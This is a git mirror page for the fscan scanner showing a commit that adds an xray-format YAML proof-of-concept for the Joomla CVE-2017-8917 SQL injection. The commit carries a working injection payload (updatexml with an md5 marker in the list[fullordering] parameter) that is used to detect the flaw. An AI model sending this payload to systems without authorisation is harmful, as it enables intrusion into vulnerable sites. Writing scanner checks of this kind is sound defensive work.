mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,8 @@
|
||||
name: poc-yaml-joomla-cve-2017-8917-sqli
|
||||
rules:
|
||||
- method: GET
|
||||
path: "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
|
||||
expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
|
||||
detail:
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917
|
||||
Reference in New Issue
Block a user